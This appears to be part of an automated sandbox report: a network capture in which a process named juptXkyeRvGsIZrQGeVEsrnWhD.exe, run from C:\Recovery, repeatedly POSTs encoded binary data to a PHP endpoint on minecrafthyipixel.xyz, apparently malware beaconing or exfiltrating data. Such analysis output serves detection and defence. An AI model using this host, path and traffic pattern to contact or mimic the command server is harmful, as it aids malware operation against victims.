                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:57.383658886 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:57.383833885 CEST | 2504 | OUT | Data Raw: 52 5e 5b 59 59 44 51 58 5c 5e 59 59 57 57 58 53 54 52 5f 5f 54 5b 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^[YYDQX\^YYWWXSTR__T[S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^%="V5;Z00'8!W>?X&8T&S#5>< /,^.5$[. X


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49785 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:57.662305117 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2172
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:57.766886950 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:42:57.767132998 CEST | 2172 | OUT | Data Raw: 57 5a 5e 5d 59 4a 51 5d 5c 5e 59 59 57 51 58 52 54 5a 5f 5e 54 5c 53 59 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YJQ]\^YYWQXRTZ_^T\SY^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%>.R5((3<$]=*8?%28>7T.P);[4Z$Z.5$[. X =
Apr 19, 2024 13:42:58.037465096 CEST | 766 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:57 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=uns1aaQf4pAYpTCScLRFE2kpL2NLeWxz9ByC7NLAxyYHkksvAkWmcq3jCw6%2BF3odbmpAgW6tQBffS9gX03636ahOdkGdDAVVIcAvnyJ4cpPNtxZB17O2AOE%2BTifX1RT33j5EBKFEE8s%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25ab97a53b5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 24 58 27 26 3e 58 21 5c 30 02 29 1d 3e 12 3d 0e 36 05 3e 17 32 02 22 3d 23 0d 2c 04 0e 5b 3f 2b 00 17 32 0a 31 1a 27 03 37 0e 27 30 21 59 00 1a 39 58 23 3c 2e 00 39 39 04 03 2b 1f 25 10 20 0c 28 03 3f 07 3d 19 20 28 33 5d 3f 2e 25 56 2f 38 24 50 29 28 08 05 2d 37 25 04 21 3b 2c 52 09 12 26 0d 2b 38 28 58 32 0e 00 0d 20 31 20 58 3f 3f 26 5d 24 3b 2f 0f 31 0d 2b 05 2e 0c 3a 1d 25 07 35 10 28 3a 24 1e 23 3c 0b 19 26 14 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98$X'&>X!\0)>=6>2"=#,[?+21'7'0!Y9X#<.99+% (?= (3]?.%V/8$P)(-7%!;,R&+8(X2 1 X??&]$;/1+.:%5(:$#<&.^,+H0TW
Apr 19, 2024 13:42:58.037525892 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49786 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:57.825751066 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:57.930658102 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:57.931044102 CEST2512OUTData Raw: 57 5e 5e 5a 59 41 51 5a 5c 5e 59 59 57 56 58 5a 54 50 5f 5b 54 5a 53 5e 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^ZYAQZ\^YYWVXZTP_[TZS^^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&%5$$'))'\%?$86 !1)]77? ]-5$[. X !
Apr 19, 2024 13:42:58.187665939 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fVkmrIItz7Bv9%2BY2ALC%2F%2BxhU1ms%2F6jN%2BsfrqqBPbyjKYqmUCrkdui2NLv4JUbbQQjRJBqLeSuprgFvv0tbm7rxNNwrD7HoDWgJa6VJZReBfmJJAZctuL03L3hKkAz8c9ozBihWEad4Q%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25bbf934502-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:58.187731028 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49787 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:58.406861067 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
Apr 19, 2024 13:42:58.512396097 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:58.512777090 CEST2512OUTData Raw: 57 5a 5b 5b 59 4b 54 55 5c 5e 59 59 57 5e 58 5b 54 51 5f 5c 54 55 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ[[YKTU\^YYW^X[TQ_\TUS[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%'="W ;07^'1U)^?2*<V%72)(#_4<#-%$[. X
Apr 19, 2024 13:42:58.777456045 CEST | 631 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:58 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RCwX%2B%2FGUqdzKeeKCDrnk%2BypY%2BuJ6f%2B57AkXcQ0Mm%2FfGLsAorvWxmqVXAi5lQXCimAqfBXe%2Brpg59rNlcOOfssSaN5u%2F1HvK5df6rJWMUsxBtZlgjnEPXfG57fA5qc0UKyqYSEKg1%2BJs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca25f6c59ade1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:58.777519941 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49788 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:58.999324083 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2504
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:59.103987932 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:59.105281115 CEST2504OUTData Raw: 52 5a 5e 58 5c 47 54 5c 5c 5e 59 59 57 57 58 53 54 52 5f 58 54 5d 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ^X\GT\\^YYWWXSTR_XT]SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%2>!('03 '-Q=$2*$1;.Q4>)+;]7</%$[. X
Apr 19, 2024 13:42:59.501168013 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:42:59 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ex0Kx8Q7iJOTjxFVXvMQt4ESMeYFrWn7IG1WkEEwQxjXDSCxF2CUoibLiKkuGUemnlbfiMMlV5LeiGbui8qmpxBfZs5Hn4Rfv2%2BfJgphqxC%2B7gt6XCX7jsk7hO%2BY7NuOTlyC6j%2F02mY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2631cd37bbe-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:42:59.501235962 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49789 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:42:59.764090061 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:42:59.868505955 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:42:59.868673086 CEST2512OUTData Raw: 52 5e 5e 5e 59 44 54 5f 5c 5e 59 59 57 55 58 5e 54 54 5f 5d 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: R^^^YDT_\^YYWUX^TT_]T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%_2>)!+<Z$V#]';")+X%_#%= T>P)Z49$[. X -
Apr 19, 2024 13:43:00.261042118 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sXYS0fjWMqq%2F5HGYeMSHqh0ctB%2Fn7KImivRIgPATs4GIiCVxbqJEoarNjKhJUFQO4pEB5fjfNLZJ6pCGYcrzSl1WN%2Faxc1C8zBjU0g0NZCCX7UMVSlW4%2FkRmyNN0hNN%2B65XmAPWLX0U%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca267da78453b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:00.261101961 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
42 | 192.168.2.4 | 49790 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:00.485090971 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:00.591140032 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:00.591305971 CEST2512OUTData Raw: 57 5e 5e 5b 5c 40 54 5a 5c 5e 59 59 57 54 58 53 54 55 5f 57 54 58 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W^^[\@TZ\^YYWTXSTU_WTXSV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&&X*"+ &#?0>>;'\2)(S18-#T5++4#3.$[. X )
Apr 19, 2024 13:43:00.854088068 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:00 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jPRRX7%2Bgo%2FNrpXJCPcldTlt7cv9b5PfmDvAeXoKVPg%2BDN8cE%2BRxdEpXjBGlqWGC14Ik2xfQQ3QWsdjTzuQtgYUOlVG0CRej4bbVh4qrMLTS3Z5LTdXEEyQfZUo%2B%2BeTinjYBENC%2FHBvs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca26c6de2b077-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:00.854151011 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
43 | 192.168.2.4 | 49791 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:01.088618994 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:01.195034981 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:43:01.195213079 CEST2512OUTData Raw: 57 5b 5e 5e 5c 43 51 5d 5c 5e 59 59 57 5e 58 5e 54 57 5f 58 54 5a 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W[^^\CQ]\^YYW^X^TW_XTZS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\1!"8#$;3]1P>(1:;2;2!"W)#,(:%$[. X
Apr 19, 2024 13:43:01.445652962 CEST | 623 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:01 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iLRRMWJFy6LpBc%2FTHeWFyXt4OgKWObGAyz8M2vOfckNcJbjoSemcYDAq%2F7Fyy%2F693h2MlTgzq2u%2F8W7S2yS5Ip6GYp1tI76bOVyXQHlb7k%2FX08eGXJjlo42wdsf2sHhhT8TCknaDKak%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca2702e646768-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:01.445719004 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
44 | 192.168.2.4 | 49792 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:01.690337896 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:01.795814037 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:01.796107054 CEST | 2512 | OUT | Data Raw: 52 5a 5b 59 59 43 51 59 5c 5e 59 59 57 5e 58 5b 54 5b 5f 5a 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: RZ[YYCQY\^YYW^X[T[_ZT\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%!](\0V43]1?8?&$%(.!16P*8$7//.$[. X
Apr 19, 2024 13:43:02.146584988 CEST | 615 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:43:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Xdq4hPXVlfOAaOGOxVOKEQt5SIKwlmUcsfteYEbdXp4EycT8NLsuQDeWDVkVHRJz%2Fx3BKd9BfCxj21OnWvJLDoxlpiomcwxG3W4VljanJqrpVWsDyJVA7Y8T3NPsIqtVEnQ6v1g2roA%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca273e918452b-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
Apr 19, 2024 13:43:02.146616936 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
45 | 192.168.2.4 | 49793 | 104.21.57.61 | 80 | 6756 | C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exe
Timestamp | Bytes transferred | Direction | Data
Apr 19, 2024 13:43:03.511203051 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2192
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
Apr 19, 2024 13:43:03.616178989 CEST | 25 | IN | HTTP/1.1 100 Continue
Apr 19, 2024 13:43:03.737971067 CEST | 2192 | OUT | Data Raw: 57 54 5e 59 59 4b 54 5e 5c 5e 59 59 57 54 58 5f 54 51 5f 5e 54 5d 53 5d 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
